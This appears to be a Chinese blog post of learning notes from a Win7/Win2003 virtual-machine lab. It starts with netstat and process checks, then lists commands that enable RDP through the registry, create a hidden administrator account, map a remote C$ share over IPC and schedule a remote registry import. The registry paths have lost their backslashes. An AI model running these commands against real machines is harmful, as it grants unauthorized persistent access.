物理机系统:Win7
虚拟机系统:Win2003
Netstat –an 查看本机端口
Netstat –ano 查看本机端口+PID
通过本机上操作(比如登录网站),然后命令,查看对方IP以及端口
首先使用360极速浏览器插件查看本机ip
本机IPv6地址(临时),感觉很屌!!!!
网页访问百度之后
百度IP
Netstat –ano查看
内部地址转外部地址
出现问题:本地地址访问的百度是172.19.166.5,但是没有172.19.166.5与外部地址的转换,初步怀疑是IPv6,但是百度ip显示的是
很是疑惑。
查看是哪个进程 ---- Tasklist
正题之一
命令行开启3389端口
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
命令: net user 帐号 密码 /add –创建帐号的命令
net localgroup administrators 帐号 /add --提升管理员命令
net use 查询ipc链接
net time \IP ---查询时间
360,你为何如此的屌!!!
结果:
net use q: \IP地址c$ --- 将远程IP的c盘映射到本机q盘
结果:
at \IP 时间 regedit /s 路径 ---注册表导入命令
(打开3389端口)
注册表内容:
1 Windows Registry Editor Version 5.00 2 3 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache] 4 "Enabled"="0" 5 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] 6 "ShutdownWithoutLogon"="0" 7 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] 8 "EnableAdminTSRemote"=dword:00000001 9 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] 10 "TSEnabled"=dword:00000001 11 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] 12 "Start"=dword:00000002 13 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] 14 "Start"=dword:00000002 15 [HKEY_USERS.DEFAULTKeyboard LayoutToggle] 16 "Hotkey"="1" 17 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTdstcp] 18 "PortNumber"=dword:00000D3D 19 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] 20 "PortNumber"=dword:00000D3D
正题之二
防御
这只是很简单的学习,但是从中学到了许多。
转载请注明出处:http://www.cnblogs.com/yydcdut/p/3462810.html